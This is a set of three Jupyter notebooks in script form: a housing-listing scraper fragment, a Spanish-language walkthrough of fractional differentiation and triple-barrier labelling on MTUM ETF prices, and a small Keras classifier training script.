# The elements alternate: even indices go to `emi`, odd indices to `rate`.
for i in soup.find_all("div",class_="font-semi-bold heading-6"):
    full_info.append(i.text)
for i in range(0,len(full_info)-1,2):
    emi.append(full_info[i])
    rate.append(full_info[i+1])
# -
rate
# Odd-indexed entries of full_info (same values as `rate` above).
point=[]
for i in range(1, len(full_info),2):
    point.append(full_info[i])
point
# +
# NOTE(review): this loop just copies `point` into `poin` unchanged.
poin=[]
for i in range(0, len(point),):
    poin.append(point[i])
# -
poin
# print length of each collected column
print(len(point),len(full_info),len(location),len(house_title),len(square_feet))
import pandas as pd
# Assemble the scraped columns into a DataFrame.
df=pd.DataFrame({'House Title':house_title,'Area':square_feet,'Location': location})
df
|
7)NO BROKER.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Fractional differentiation
#
# ## Objetivos
#
# - Revisar algunos algortimos de Advances in Financial Machine Learning. Capítulo 5.
# - Tópicos de Diferenciación fraccionaria.
#
#
# ## Bibliografia
#
# - <NAME>. Advances in Financial Machine Learning. Wiley
#
# ## Recursos
#
# - Python 3.7+
# - Jupyter notebook.
# - Pandas
# - numpy
# - matplotlib
# - stattools
#
# ## Descripcion
#
# En la siguiente notebook vamos a seguir la linea de trabajo del capítulo 5 del libro.
# A partir de un dataset descargado de Yahoo Finance del ETF [MTUM](https://www.ishares.com/us/products/251614/ishares-msci-usa-momentum-factor-etf) vamos a
# generar labels de entrada y salida con el método de la triple frontera:
#
# - Frontera de profit taking (frontera horizontal superior)
# - Frontera de stop loss (frontera horizontal inferior)
# - Frontera temporal (frontera vertical)
#
# Luego, vamos a computar los pesos a cada sample según la superposición de eventos que
# ocurran entre $t_{i,0}$ (evento de nuestra estrategia) y $t_{i,1}$ (vertical barrier)
# del evento $i$.
#
# Dichos pesos los vamos a ponderar temporalmente luego para que los eventos más recientes
# impacten más respecto de los anteriores.
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
# +
# # %load mpfin.py
import multiprocessing as mp
import datetime as dt
import time
import sys
def mpPandasObj(func, pdObj, numThreads=24, mpBatches=1, linMols=True, **kargs):
    '''
    Parallelize jobs and return a DataFrame or Series.
    Multiprocessing snippet [20.7] from Advances in Financial Machine Learning.
    + func: function to be parallelized. Returns a DataFrame/Series.
    + pdObj[0]: name of the argument used to pass the molecule
    + pdObj[1]: list of atoms that will be grouped into molecules
    + kargs: any other keyword arguments needed by func
    Example: df1 = mpPandasObj(func, ('molecule', df0.index), 24, **kwds)
    '''
    import pandas as pd
    # Split the atom list into molecules (linear or nested partitions).
    if linMols:
        parts = linParts(len(pdObj[1]), numThreads * mpBatches)
    else:
        parts = nestedParts(len(pdObj[1]), numThreads * mpBatches)
    jobs = []
    for i in range(1, len(parts)):
        job = {pdObj[0]: pdObj[1][parts[i - 1]:parts[i]], 'func': func}
        job.update(kargs)
        jobs.append(job)
    # Single-thread path is sequential (useful for debugging).
    if numThreads == 1:
        out = processJobs_(jobs)
    else:
        out = processJobs(jobs, numThreads=numThreads)
    if not isinstance(out[0], (pd.DataFrame, pd.Series)):
        return out
    # pd.concat replaces the per-chunk DataFrame.append loop of the original
    # snippet; DataFrame.append was removed in pandas 2.0.
    df0 = pd.concat(out)
    return df0.sort_index()
def processJobs_(jobs):
    """Run jobs one at a time in the current process (handy for debugging)."""
    return [expandCall(job) for job in jobs]
def linParts(numAtoms, numThreads):
    """Partition numAtoms into equal contiguous chunks for single-loop jobs.

    Returns an int array of chunk boundaries from 0 to numAtoms.
    """
    edges = np.linspace(0, numAtoms, min(numThreads, numAtoms) + 1)
    return np.ceil(edges).astype(int)
def nestedParts(numAtoms, numThreads, upperTriang=False):
    """Partition numAtoms for jobs with an inner (triangular) loop.

    Boundaries are chosen so each chunk carries roughly equal triangular
    workload; with upperTriang=True the first chunks are the heaviest.
    """
    edges = [0]
    nJobs = min(numThreads, numAtoms)
    for _ in range(nJobs):
        # Solve the quadratic that equalizes the triangular workload.
        val = 1 + 4 * (edges[-1] ** 2 + edges[-1] + numAtoms * (numAtoms + 1.) / nJobs)
        edges.append((-1 + val ** .5) / 2.)
    edges = np.round(edges).astype(int)
    if upperTriang:  # the first rows are heaviest
        edges = np.cumsum(np.diff(edges)[::-1])
        edges = np.append(np.array([0]), edges)
    return edges
import datetime as dt
def reportProgress(jobNum, numJobs, time0, task):
    """Write a one-line progress report to stderr as async jobs complete.

    Uses '\\r' while jobs remain (so the line updates in place) and '\\n'
    on the final job.
    """
    done_frac = float(jobNum) / numJobs
    elapsed_min = (time.time() - time0) / 60.
    remaining_min = elapsed_min * (1 / done_frac - 1)
    stamp = str(dt.datetime.fromtimestamp(time.time()))
    line = (stamp + ' ' + str(round(done_frac * 100, 2)) + '% ' + task +
            ' done after ' + str(round(elapsed_min, 2)) +
            ' minutes. Remaining ' + str(round(remaining_min, 2)) + ' minutes.')
    if jobNum < numJobs:
        sys.stderr.write(line + '\r')
    else:
        sys.stderr.write(line + '\n')
    return
def processJobs(jobs, task=None, numThreads=24):
    """Run jobs in parallel through a multiprocessing pool.

    Each job dict must contain a 'func' callback for expandCall; progress
    is reported to stderr as results arrive (in completion order).
    """
    if task is None:
        task = jobs[0]['func'].__name__
    pool = mp.Pool(processes=numThreads)
    results = []
    started = time.time()
    # Process async output and report progress as each job finishes.
    for done_count, result in enumerate(pool.imap_unordered(expandCall, jobs), 1):
        results.append(result)
        reportProgress(done_count, len(jobs), started, task)
    pool.close()
    pool.join()  # this is needed to prevent memory leaks
    return results
def expandCall(kargs):
    """Invoke kargs['func'] with the remaining entries as keyword arguments.

    Note: mutates the input dict by removing the 'func' key, matching the
    original snippet's behavior.
    """
    callback = kargs.pop('func')
    return callback(**kargs)
# +
# # %load labelling.py
import numpy as np
import pandas as pd
def getDailyVol(close, span0=100):
    '''
    Computes the daily volatility of price returns.
    It takes a closing price series, applies a diff sample to sample
    (assumes each sample is the closing price), computes an EWM with
    `span0` samples and then the standard deviation of it.
    See Advances in Financial Analytics, snippet 3.1
    @param[in] close A series of prices where each value is the closing price of an asset.
                     The index of the series must be a valid datetime type.
    @param[in] span0 The sample size of the EWM.
    @return A pandas series of daily return volatility.
    '''
    # Position of the latest bar at least one day before each bar; bars with
    # no earlier-day predecessor (position 0) drop out.
    df0 = close.index.searchsorted(close.index-pd.Timedelta(days=1))
    df0 = df0[df0 > 0]
    # Map each bar timestamp to the timestamp of its previous-day bar.
    df0 = pd.Series(close.index[df0-1], index=close.index[close.shape[0]-df0.shape[0]:])
    df0 = close.loc[df0.index] / close.loc[df0.values].values-1 # Daily returns
    # Exponentially-weighted standard deviation of those daily returns.
    df0 = df0.ewm(span=span0).std()
    return df0
def getVerticalBarrier(tEvents, close, numDays=0):
    """
    Add a vertical (time) barrier to each event.
    For every timestamp in tEvents, find the first price bar at or
    immediately after numDays days later. Events whose barrier would fall
    beyond the last available bar are dropped from the result.
    Advances in Financial Machine Learning, Snippet 3.4 page 49.
    @param tEvents A pd.DatetimeIndex of event start times.
    @param close A pd.Series of close prices indexed by timestamp.
    @param numDays Number of days defining the vertical barrier.
    @return A pd.Series mapping event start -> vertical-barrier timestamp.
    """
    horizon = tEvents + pd.Timedelta(days=numDays)
    bar_locs = close.index.searchsorted(horizon)
    # Keep only barriers that land inside the available data.
    bar_locs = bar_locs[bar_locs < close.shape[0]]
    return pd.Series(close.index[bar_locs], index=tEvents[:bar_locs.shape[0]])
def applyPtSlOnT1(close, events, ptSl, molecule):
    '''
    Apply stop-loss / profit-taking barriers if either is hit before t1
    (the vertical barrier / end of event).
    Advances in Financial Machine Learning, snippet 3.2 page 45.
    @param close A pd.Series of prices indexed by timestamp.
    @param events DataFrame with columns 't1' (vertical barrier), 'trgt'
           (unit width of the horizontal barriers) and 'side'.
    @param ptSl Two non-negative numbers [pt, sl] scaling the profit-taking
           and stop-loss widths; 0 disables the corresponding barrier.
    @param molecule Subset of events.index handled by this job.
    @return DataFrame indexed like molecule with columns 't1', 'sl', 'pt':
            the first timestamp at which each barrier is touched (NaT if
            it is never touched).
    '''
    events_ = events.loc[molecule]
    out = events_[['t1']].copy(deep=True)
    if ptSl[0] > 0:
        pt = ptSl[0] * events_['trgt']
    else:
        # Disabled barrier: all-NaN series (explicit dtype avoids the
        # object-dtype default of empty Series in modern pandas).
        pt = pd.Series(index=events.index, dtype=float)
    if ptSl[1] > 0:
        sl = -ptSl[1] * events_['trgt']
    else:
        sl = pd.Series(index=events.index, dtype=float)  # disabled barrier
    # Series.iteritems was removed in pandas 2.0; items() is the equivalent.
    for loc, t1 in events_['t1'].fillna(close.index[-1]).items():
        df0 = close[loc:t1]  # price path of this event
        df0 = (df0 / close[loc] - 1) * events_.at[loc, 'side']  # path returns
        out.loc[loc, 'sl'] = df0[df0 < sl[loc]].index.min()  # earliest stop loss
        out.loc[loc, 'pt'] = df0[df0 > pt[loc]].index.min()  # earliest profit taking
    return out
def getEvents(close, tEvents, ptSl, trgt, minRet, numThreads, t1=False, side=None):
    '''
    Build the events DataFrame and run the triple-barrier search on it.
    @param close Price series indexed by timestamp.
    @param tEvents Timestamps seeding each event.
    @param ptSl Profit-taking / stop-loss multipliers passed to applyPtSlOnT1.
    @param trgt Series of target returns (horizontal-barrier unit widths).
    @param minRet Minimum target return required for an event to be kept.
    @param numThreads Number of workers used by mpPandasObj.
    @param t1 Series of vertical-barrier timestamps, or False for none.
    @param side Optional Series with the side of each bet (meta-labeling);
           when given, only ptSl[:2] is used asymmetrically.
    @return DataFrame with columns 't1' (time of first barrier touch) and
            'trgt' (plus 'side' when provided).
    '''
    #1) get target: restrict to seed events and drop sub-minRet targets
    trgt=trgt.loc[tEvents]
    trgt=trgt[trgt>minRet] # minRet
    #2) get t1 (max holding period); NaT means no vertical barrier
    if t1 is False:
        t1 = pd.Series(pd.NaT, index=tEvents)
    #3) form events object, apply stop loss on t1
    if side is None:
        # No side given: assume long and make the barriers symmetric.
        side_, ptSl_ = pd.Series(1.,index=trgt.index), [ptSl[0],ptSl[0]]
    else:
        side_, ptSl_= side.loc[trgt.index],ptSl[:2]
    events = (pd.concat({'t1':t1,'trgt':trgt,'side':side_}, axis=1) .dropna(subset=['trgt']))
    # Run the barrier search in parallel, one molecule of events per job.
    df0=mpPandasObj(func=applyPtSlOnT1,pdObj=('molecule',events.index),
                    numThreads=numThreads,close=close,events=events,
                    ptSl=ptSl_)
    # Earliest touch among pt / sl / vertical barrier becomes the event end.
    events['t1'] = df0.dropna(how='all').min(axis=1) # pd.min ignores nan
    if side is None:events=events.drop('side',axis=1)
    return events
def getBinsOld(events, close):
    '''
    Label events by the sign of the return between the event start and its
    end time t1. Snippet 3.5.
    @param events DataFrame indexed by event start time with a 't1' column
           holding the event end time.
    @param close A pd.Series of prices indexed by timestamp.
    @return DataFrame indexed like events with columns 'ret' (realized
            return) and 'bin' (its sign; 0 where the start coincides with
            some event's end time — see page 49, suggested exercise).
    '''
    #1) prices aligned with events
    events_ = events.dropna(subset=['t1'])
    px = events_.index.union(events_['t1'].values).drop_duplicates()
    px = close.reindex(px, method='bfill')
    #2) create out object
    out = pd.DataFrame(index=events_.index)
    out['ret'] = px.loc[events_['t1'].values].values / px.loc[events_.index] - 1
    out['bin'] = np.sign(out['ret'])
    # Where out index and t1 (vertical barrier) intersect, label 0.
    # BUG FIX: the original query referenced an undefined name `t1`, so the
    # NameError was swallowed by the bare except and the relabelling never
    # ran; bind t1 to the events' end times first.
    t1 = events_['t1']
    try:
        locs = out.query('index in @t1').index
        out.loc[locs, 'bin'] = 0
    except:
        pass  # best-effort relabelling, as in the original snippet
    return out
def getBins(events, close):
    '''
    Compute each event's outcome (including side information, if provided).
    Snippet 3.7
    Case 1: ('side' not in events): bin in (-1,1) <- label by price action
    Case 2: ('side' in events): bin in (0,1) <- label by pnl (meta-labeling)
    @param events A DataFrame whose
        - index is the event's start time
        - column t1 is the event's end time
        - column trgt is the event's target
        - column side (optional) implies the algo's position side.
    @param close A close price series.
    '''
    #1) prices aligned with events
    with_t1 = events.dropna(subset=['t1'])
    stamps = with_t1.index.union(with_t1['t1'].values).drop_duplicates()
    prices = close.reindex(stamps, method='bfill')
    #2) build the output frame
    out = pd.DataFrame(index=with_t1.index)
    out['ret'] = prices.loc[with_t1['t1'].values].values / prices.loc[with_t1.index] - 1
    meta = 'side' in with_t1
    if meta:
        out['ret'] *= with_t1['side']  # meta-labeling: pnl of the taken side
    out['bin'] = np.sign(out['ret'])
    if meta:
        out.loc[out['ret'] <= 0, 'bin'] = 0  # meta-labeling: 0 = do not trade
    return out
def dropLabels(events, minPct=.05):
    '''
    Iteratively drop the rarest label until every remaining label has at
    least @p minPct relative frequency, or only two labels remain.
    Snippet 3.8
    @param events A DataFrame with a 'bin' label column (e.g. getBins() output).
    @param minPct The minimum relative frequency a label must keep.
    @return The input @p events DataFrame, filtered.
    '''
    # apply weights, drop labels with insufficient examples
    while True:
        df0 = events['bin'].value_counts(normalize=True)
        if df0.min() > minPct or df0.shape[0] < 3:
            break
        # BUG FIX: Series.argmin returns a *position* in modern pandas;
        # idxmin returns the label itself, which is what the filter needs.
        rare = df0.idxmin()
        print('dropped label: ', rare, df0.min())
        events = events[events['bin'] != rare]
    return events
# +
# # %load events.py
def cusumFilterEvents(close, threshold):
    '''
    Symmetric CUSUM Filter.
    A quality-control method designed to detect a shift in the mean value
    of the measured quantity away from a target value:
        S^{+}_t = max{0, S^{+}_{t-1} + y_t - E_{t-1}[y_t]}, S^{+}_0 = 0
        S^{-}_t = min{0, S^{-}_{t-1} + y_t - E_{t-1}[y_t]}, S^{-}_0 = 0
    An event fires whenever either accumulator crosses +/- threshold.
    See Advances in Financial Analytics, snippet 2.4, page 39.
    @param close A price series.
    @param threshold A positive threshold flagging an event when the upward
           or downward accumulator exceeds it.
    @return A DatetimeIndex subset of @p close's index where the filter fires.
    '''
    events = []
    up, down = 0.0, 0.0
    deltas = close.diff()
    for ts in deltas.index[1:]:
        step = deltas.loc[ts]
        up = max(0.0, up + step)
        down = min(0.0, down + step)
        if down < -threshold:
            down = 0.0
            events.append(ts)
        elif up > threshold:
            up = 0.0
            events.append(ts)
    return pd.to_datetime(events)
def getEwmDf(close, fast_window_num_days=3, slow_window_num_days=7):
    '''
    Builds a three-column close-price DataFrame, where:
    - Column "close" is the `close` price.
    - Column "fast" is the EWM over @p fast_window_num_days days.
    - Column "slow" is the EWM over @p slow_window_num_days days.
    @param close A pandas series of close daily prices.
    @param fast_window_num_days A positive integer: the fast window size in days.
    @param slow_window_num_days A positive integer: the slow window size in days,
           greater than @p fast_window_num_days.
    @return A DataFrame as described above.
    '''
    frame = pd.DataFrame()
    frame['close'] = close
    frame['fast'] = close.ewm(fast_window_num_days).mean()
    frame['slow'] = close.ewm(slow_window_num_days).mean()
    return frame
def get_up_cross(df):
    '''
    @return A pandas series of events from @p df (as produced by getEwmDf())
            at the rows where the fast signal crosses above the slow signal.
    '''
    was_below = df.fast.shift(1) < df.slow.shift(1)
    is_above = df.fast > df.slow
    return df.fast[was_below & is_above]
def get_down_cross(df):
    '''
    @return A pandas series of events from @p df (as produced by getEwmDf())
            at the rows where the fast signal crosses below the slow signal.
    '''
    was_above = df.fast.shift(1) > df.slow.shift(1)
    is_below = df.fast < df.slow
    return df.fast[was_above & is_below]
def getEwmEvents(close, fast_window_num_days=3, slow_window_num_days=7):
    '''
    Generates a pandas series of buy/sell signals from EWM fast/slow crosses
    of the @p close price series: +1 when the fast signal crosses above the
    slow signal, -1 when it crosses below.
    @param close A pandas series of close daily prices.
    @param fast_window_num_days A positive integer: the fast window size in days.
    @param slow_window_num_days A positive integer: the slow window size in days,
           greater than @p fast_window_num_days.
    @return A time-sorted pandas series of +1/-1 signals.
    '''
    frame = getEwmDf(close, fast_window_num_days, slow_window_num_days)
    ups = get_up_cross(frame)
    downs = get_down_cross(frame)
    signals = pd.concat([
        pd.Series(1, index=ups.index),
        pd.Series(-1, index=downs.index),
    ])
    return signals.sort_index()
# +
# # %load frac_diff.py
def getWeights(d, size):
    '''
    Returns the coefficients used to fractionally differentiate a time series.
    @param d A non-negative real: the degree of differentiation.
    @param size The number of coefficients to generate.
    @return An (size, 1) array of coefficients, oldest lag first.
    '''
    coeffs = [1.]
    for k in range(1, size):
        # Recurrence: w_k = -w_{k-1} / k * (d - k + 1)
        coeffs.append(-coeffs[-1] / k * (d - k + 1))
    return np.array(coeffs[::-1]).reshape(-1, 1)
def getWeights_FFD(d, thres):
    '''
    Returns the fixed-width-window coefficients for fractional differentiation.
    Coefficients are generated until their absolute value drops below @p thres.
    @param d A non-negative real: the degree of differentiation.
    @param thres The minimum absolute coefficient value kept.
    @return An (n, 1) array of coefficients, oldest lag first.
    '''
    weights = [1.]
    k = 1
    nxt = -weights[-1] / k * (d - k + 1)
    while abs(nxt) >= thres:
        weights.append(nxt)
        k += 1
        nxt = -weights[-1] / k * (d - k + 1)
    return np.array(weights[::-1]).reshape(-1, 1)
def fracDiff(series, d, thres=0.01):
    '''
    Applies fractionally differentiation to time series. Uses threshold to determine the minimum
    value of coefficients the window will have (expanding-window variant).
    @param series A DataFrame of time series to fractionally differentiate.
    @param d A non-negative real that represents the degree of the differentiation.
    @param thres A threshold to omit samples below that value. When it is 1, nothing is skipped.
    @return A DataFrame whose values are fractionally differentiated.
    '''
    #1) Compute weights for the longest series
    w = getWeights(d, series.shape[0])
    #2) Determine initial calcs to be skipped based on weight-loss threshold
    w_ = np.cumsum(abs(w))
    w_ /= w_[-1]
    skip = w_[w_>thres].shape[0]
    #3) Apply weights to values
    df={}
    for name in series.columns:
        # Forward-fill gaps, then drop any leading NaNs.
        # NOTE(review): fillna(method=...) and dtype-less pd.Series() are
        # deprecated in modern pandas; behavior is unchanged here.
        seriesF = series[[name]].fillna(method='ffill').dropna()
        df_ = pd.Series()
        for iloc in range(skip, seriesF.shape[0]):
            loc = seriesF.index[iloc]
            test_val = series.loc[loc,name] # must resample if duplicate index
            if isinstance(test_val, (pd.Series, pd.DataFrame)):
                # NOTE(review): '1m' frequency alias — confirm whether minute
                # or month resampling is intended here.
                test_val = test_val.resample('1m').mean()
            if not np.isfinite(test_val).any(): continue # exclude NAs
            try:
                # Dot product of the trailing weights with the full history up to loc.
                df_.loc[loc] = np.dot(w[-(iloc+1):,:].T, seriesF.loc[:loc])[0,0]
            except:
                continue
        df[name] = df_.copy(deep=True)
    df = pd.concat(df,axis=1)
    return df
def fracDiff_FFD(series,d,thres=1e-5):
    '''
    Applies fractionally differentiation to time series using a constant-width
    window whose size is determined by @p thres.
    @param series A DataFrame of time series to apply the fractionally differentiation.
    @param d A non-negative real that represents the degree of the differentiation.
    @param thres A threshold to omit coefficients below that value. When it is 1, nothing is skipped.
    @return A DataFrame whose values are fractionally differentiated.
    '''
    w = getWeights_FFD(d,thres) # Constant width window (new solution)
    width = len(w)-1
    df={}
    for name in series.columns:
        # Forward-fill gaps, then drop leading NaNs.
        # NOTE(review): fillna(method=...) and dtype-less pd.Series() are
        # deprecated in modern pandas; behavior is unchanged here.
        seriesF = series[[name]].fillna(method='ffill').dropna()
        df_ = pd.Series()
        for iloc1 in range(width,seriesF.shape[0]):
            # Window endpoints: exactly `width + 1` observations.
            loc0 = seriesF.index[iloc1-width]
            loc1 = seriesF.index[iloc1]
            test_val = series.loc[loc1,name] # must resample if duplicate index
            if isinstance(test_val, (pd.Series, pd.DataFrame)):
                # NOTE(review): '1m' frequency alias — confirm whether minute
                # or month resampling is intended here.
                test_val = test_val.resample('1m').mean()
            if not np.isfinite(test_val).any(): continue # exclude NAs
            try:
                # Fixed-width dot product of the weights with the window.
                df_.loc[loc1] = np.dot(w.T, seriesF.loc[loc0:loc1])[0,0]
            except:
                continue
        df[name] = df_.copy(deep=True)
    df = pd.concat(df, axis=1)
    return df
def compute_multiple_ffd(close, threshold, dd):
    '''
    For each differentiation degree d in @p dd, fractionally differentiate the
    daily log 'Close' series and run an ADF stationarity test on the result.
    @param close A DataFrame with a 'Close' column indexed by timestamp.
    @param threshold Coefficient threshold forwarded to fracDiff_FFD.
    @param dd Iterable of differentiation degrees to evaluate.
    @return A DataFrame indexed by d with the ADF statistic, p-value, lags,
            number of observations, 95% critical value, and the correlation
            between the original and differentiated series.
    '''
    from statsmodels.tsa.stattools import adfuller
    out = pd.DataFrame(columns=['adfStat','pVal','lags','nObs','95% conf','corr'])
    df0 = close
    for d in dd:
        df1 = np.log(df0).resample('1D').last().dropna() # downcast to daily obs. Dropped NAs
        df2 = fracDiff_FFD(df1, d, thres=threshold).dropna()
        # Correlation between original and differentiated log prices
        # (how much memory the transform preserved).
        corr = np.corrcoef(df1.loc[df2.index,'Close'], df2['Close'])[0,1]
        df2 = adfuller(df2['Close'], maxlag=1, regression='c', autolag=None)
        out.loc[d] = list(df2[:4]) + [df2[4]['5%']]+[corr] # with critical value
    return out
def get_d_optim(out, conf=0.05):
    """Return the differentiation degree (index of ``out``) whose ADF p-value is
    the largest one still below the significance level ``conf``."""
    significant = out[out.pVal < conf]
    return significant.pVal.idxmax()
# -
# ### 1.- Exploración del dataset
#
# - Levantamos el datset desde un CSV
# - Nota: indexamos el dataset con la columna de fechas para poder aprovechar las funciones del libro
# como estan dadas.
# - Describimos el dataset.
# - Mostramos la evolución de las series.
#
#
# A saber, las columnas son:
#
# - `Date`: es la fecha que aplica una estampa temporal a la fila.
# - `Open`: es el precio en USD al que abre la cotización del fondo.
# - `High`: es el mayor valor en USD que alcanza la cotización del fondo.
# - `Low`: es el menor valor en USD que alcanza la cotización del fondo.
# - `Close`: es el valor de cierre en USD que alcanza la cotización del fondo.
# - `Adj Close`: es el precio ajustado que alcanzan algunos activos producto de multiplicadores por regalías y dividendos. Ver https://help.yahoo.com/kb/SLN28256.html para una descripción más detallada al respecto.
# - `Volume`: cantidad total de USD operados.
MTUM_PATH = '../datasets/mtum.csv'
# Helper that converts a date string into a date object.
# NOTE: pd.datetime was removed in pandas 2.x; pd.to_datetime is the supported API.
string_to_date = lambda x: pd.to_datetime(x, format="%Y-%m-%d")
# Load the dataset, parsing the `Date` column and using it as the index so the
# book's time-series helpers can be used as given. The dates are ISO-formatted
# (%Y-%m-%d), which `parse_dates` handles directly — the deprecated
# `date_parser=` argument is no longer needed.
mtum = pd.read_csv(MTUM_PATH, parse_dates=['Date'], index_col='Date')
mtum.head() # First rows of the dataset.
mtum.tail() # Filas finales del dataset.
# [#Filas, #Columnas]
mtum.shape[0], mtum.shape[1]
# Tipo de dato de cada columna.
mtum.dtypes
# Ploteamos la series.
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(20,10))
mtum.plot(kind='line',y='Close', color='blue', ax=ax)
mtum.plot(kind='line',y='High', color='green', ax=ax)
mtum.plot(kind='line',y='Low', color='red', ax=ax)
mtum.plot(kind='line',y='Open', color='orange', ax=ax)
plt.title('MTUM prices')
plt.grid()
plt.show()
# En particular los va a interesar el precio de cierre.
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(20,10))
mtum.plot(kind='line',y='Close', color='blue', ax=ax)
plt.title('MTUM Close Price')
plt.grid()
plt.show()
# Solo para comparar, miramos el volumen operado.
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(20,10))
mtum.plot(kind='line',y='Volume', color='blue', ax=ax)
plt.title('MTUM volume')
plt.grid()
plt.show()
# ## 2.- Cómputo de series diferenciadas fraccionariamente
#
# Lo que se busca es obtener la estacionariedad de las series y ello conlleva a diferenciaciones. El inconveniente de la diferenciacion entera es la remoción de la memoria lo cual genera que se pierda información predictiva de la serie que un modelo pueda capturar posteriormente.
#
# El trabajo siguiente de la notebook va a obtener un valor óptimo del grado de diferenciación para mantener la estacionariedad de la serie. El método es por fuerza bruta en un espacio de búsqueda de una dimensión, el grado de diferenciación. En caso de querer ser más precisos, se puede iterar en la búsqueda de un mínimo global pero las diferencias en el segundo decimal son marginales en muchos casos.
#
# La serie diferenciada se la utiliza para la obtención de eventos.
#
# Notar que uno obtiene la volatilidad como indicador de barrera superior e inferior de una serie ya diferenciada!
#
# El proceso de generación es idéntico a los vistos previamente.
# Computo una lista de valores de d (el grado de diferenciación),
# y diferencio la serie de precios.
ds = np.linspace(0, 1, 21)
out = compute_multiple_ffd(mtum['Close'].to_frame(), 1e-3, ds)
out
# Realizamos un plot para evaluar gráficamente el valor óptimo.
out[['adfStat','corr']].plot(secondary_y='adfStat')
mean_95conf = out['95% conf'].mean()
optim_d = get_d_optim(out, conf=0.05)
plt.axhline(mean_95conf,linewidth=1,color='r',linestyle='dotted')
plt.axvline(optim_d,linewidth=1,color='g',linestyle='dotted')
plt.grid()
plt.title('ADF Stat, Autorrelacion vs D')
print('Promedio de valores críticos para el estadístico al 5%: {}'.format(mean_95conf))
print('Valor óptimo de d: {}'.format(optim_d))
mtum['CloseFFD'] = fracDiff_FFD(mtum['Close'].to_frame(), d=optim_d, thres=1e-3)
# Ploteamos la series.
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(20,10))
mtum.plot(kind='line',y='Close', color='blue', ax=ax)
mtum.plot(kind='line',y='CloseFFD', color='green', ax=ax)
plt.title('MTUM prices and Optim FFD')
plt.grid()
plt.show()
# ## 3.- Desarrollo con labels
#
# Ver [Labelling sec.2](https://github.com/agalbachicar/financial_analytics/blob/master/notebooks/labelling.ipynb) para más detalle.
# Computamos la volatilidad diaria, suavizada con una media
# movil pesada de 50 dias (arbitraria, también se podria aprender)
daily_vol = getDailyVol(close=mtum['CloseFFD'], span0=50)
# Volatilidad media.
daily_vol.mean()
# Graficamos la volatilidad a lo largo de la historia del ETF.
# La línea roja muestra el valor medio.
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(15,7))
daily_vol.plot(kind='line',y='dailyVol', color='blue', ax=ax)
ax.axhline(daily_vol.mean(),ls='--',color='r')
plt.title('MTUM FFD daily volatility')
plt.grid()
plt.show()
# Usamos CUSUM simetrico como generador de eventos.
# Usamos la media de la volatilidad como umbral que nos indique los eventos
# en que el que operaremos.
tEvents = cusumFilterEvents(mtum['CloseFFD'], threshold=daily_vol.mean())
tEvents
# Definimos el tiempo de la barrera vertical. Esto es algo a optimizar
# y debe ajustarse en conjunto con los valores de retorno PT y SL.
num_days = 6
# Computamos las marcas temporales de la ventana. Para cada evento
# en tEvents (inicio de la ventana), obtenemos el final de la ventana.
t1 = getVerticalBarrier(tEvents, mtum['CloseFFD'], numDays=num_days)
t1
# Definimos las bandas de PT y SL.
ptsl = [2*daily_vol.mean(), 2*daily_vol.mean()]
target = daily_vol
# Seleccionamos el mínimo retorno considerado.
minRet = 0.01
# Numero de CPUs para el procesamiento en paralelo.
cpus = 4
# Generamos los eventos de la triple frontera. En esta funcion obtenemos
# un dataframe cuyo indice es cuando ocurre el evento y tiene 2 columnas
# - t1: momento en el que sucede el evento.
# - trgt: retorno obtenido en ese momento.
triple_barrier_events = getEvents(mtum['CloseFFD'],tEvents,ptsl,target,minRet,cpus,t1=t1)
triple_barrier_events
# Obtenemos los labels! Los labels nos dan la siguiente informacion:
# - Indice: momento en el que ocurre el evento segun nuestra estrategia.
# - Columna ret: el retorno que vamos a obtener.
# - Columna bin: lo que sucede con la señal de precio:
# - 1: la señal impacta la barrera de profit taking (horizontal superior).
# - 0: la señal impacta la barrera vertical (no se hace nada).
# - -1: la señal impacta la barrea de stop loss (horizontal inferior).
labels = getBinsOld(triple_barrier_events, mtum['CloseFFD'])
labels
# Una pequeña tabla de contención que nos indica como se distribuyen
# los labels.
labels['bin'].value_counts()
|
src/notebooks/frac_diff.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import Preprocess as util
import numpy as np
import matplotlib.pyplot as plt
import keras
import keras.backend as K
from sklearn.model_selection import train_test_split
from keras.models import Model, Sequential, Input
from keras.layers import Dropout, Flatten, Dense
# # Load and Train and Test Split
# +
input_data, labels = util.load_data()
print('Input Data Shape = {}'.format(input_data.shape))
print('Labels Shape = {}'.format(labels.shape))
train_x, test_x, train_y, test_y = train_test_split(input_data, labels, test_size = 0.20, random_state = 42)
print('Training input data shape = {}'.format(train_x.shape))
print('Training labels shape = {}'.format(train_y.shape))
print('Testing input data shape = {}'.format(test_x.shape))
print('Testing labels shape = {}'.format(test_y.shape))
# -
# # Architecture of Neural Network
# +
input_tensor = Input(shape = (input_data.shape[1],))
def model(input_value):
    """Build and return a fully connected binary classifier on top of ``input_value``.

    Five hidden Dense layers (200, 100, 50, 30, 10 units) with alternating
    tanh/relu activations feed a single sigmoid output unit. Prints the model
    summary as a side effect.
    """
    layer_specs = [(200, 'tanh'), (100, 'relu'), (50, 'tanh'),
                   (30, 'relu'), (10, 'tanh')]
    x = input_value
    for units, activation in layer_specs:
        x = Dense(units=units, activation=activation)(x)
    output = Dense(units=1, activation='sigmoid')(x)
    # local renamed from `model` so it no longer shadows this function's name
    net = Model(inputs=input_value, outputs=output, name='model')
    net.summary()
    return net
def compile_and_train(model, num_epochs):
    """Compile ``model`` (Adam optimizer, MSE loss, accuracy metric) and fit it.

    NOTE(review): reads the globals ``train_x`` and ``train_y`` created in the
    data-loading cell above rather than receiving the data as parameters —
    confirm those names exist before calling.

    Returns the Keras ``History`` object produced by ``fit``.
    """
    model.compile(optimizer= 'adam', loss= 'mse', metrics = ['acc'])
    history = model.fit(train_x, train_y, batch_size=32, epochs = num_epochs)
    return history
# -
# # Training Model on Train Dataset
epochs = 200
model = model(input_tensor)
history = compile_and_train(model, epochs)
# # Plot the Graphs
# +
epoch_list = [i for i in range(epochs)]
